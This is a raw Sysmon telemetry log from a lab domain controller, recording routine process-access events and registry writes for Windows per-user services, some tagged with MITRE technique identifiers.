13:58:17.493{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.493{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1dc37|C:\Windows\system32\services.exe+17f38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 13241300x800000000000000010194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\Description@%%SystemRoot%%\system32\WpnUserService.dll,-2 13241300x800000000000000010193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\FailureActionsBinary Data 13241300x800000000000000010192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\Security\SecurityBinary Data 13241300x800000000000000010191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\DisplayNameWindows Push Notifications User Service_2d0727 13241300x800000000000000010190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x800000000000000010189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\ErrorControlDWORD (0x00000000) 13241300x800000000000000010188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\StartDWORD (0x00000003) 13241300x800000000000000010187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\TypeDWORD (0x000000e0) 13241300x800000000000000010186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-14000 13241300x800000000000000010185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\FailureActionsBinary Data 13241300x800000000000000010184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\Security\SecurityBinary Data 13241300x800000000000000010183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\DisplayNameUser Data Access_2d0727 13241300x800000000000000010182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x800000000000000010181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\ErrorControlDWORD (0x00000000) 13241300x800000000000000010180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\StartDWORD (0x00000003) 13241300x800000000000000010179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\TypeDWORD (0x000000e0) 13241300x800000000000000010178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-10002 13241300x800000000000000010177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\FailureActionsBinary Data 13241300x800000000000000010176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\Security\SecurityBinary Data 13241300x800000000000000010175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\DisplayNameUser Data Storage_2d0727 13241300x800000000000000010174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\ImagePathC:\Windows\System32\svchost.exe -k UnistackSvcGroup 13241300x800000000000000010173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\ErrorControlDWORD (0x00000000) 13241300x800000000000000010172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\StartDWORD (0x00000003) 13241300x800000000000000010171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\TypeDWORD (0x000000e0) 13241300x800000000000000010170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-15000 13241300x800000000000000010169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\FailureActionsBinary Data 13241300x800000000000000010168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\Security\SecurityBinary Data 13241300x800000000000000010167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\DisplayNameContact Data_2d0727 13241300x800000000000000010166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x800000000000000010165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\ErrorControlDWORD (0x00000000) 13241300x800000000000000010164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\StartDWORD (0x00000003) 13241300x800000000000000010163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\TypeDWORD (0x000000e0) 13241300x800000000000000010162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\Description@%%SystemRoot%%\system32\APHostRes.dll,-10001 13241300x800000000000000010161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\FailureActionsBinary Data 13241300x800000000000000010160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\Security\SecurityBinary Data 13241300x800000000000000010159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\DisplayNameSync Host_2d0727 13241300x800000000000000010158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x800000000000000010157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\ErrorControlDWORD (0x00000000) 13241300x800000000000000010156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\StartDWORD (0x00000002) 13241300x800000000000000010155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\TypeDWORD (0x000000e0) 13241300x800000000000000010154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\Description@%%SystemRoot%%\system32\cdpusersvc.dll,-101 13241300x800000000000000010153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\FailureActionsBinary Data 13241300x800000000000000010152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\Security\SecurityBinary Data 13241300x800000000000000010151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\DisplayNameCDPUserSvc_2d0727 13241300x800000000000000010150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x800000000000000010149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\ErrorControlDWORD (0x00000001) 13241300x800000000000000010148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\StartDWORD (0x00000002) 13241300x800000000000000010147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\TypeDWORD (0x000000e0) 10341000x800000000000000010146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.446{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 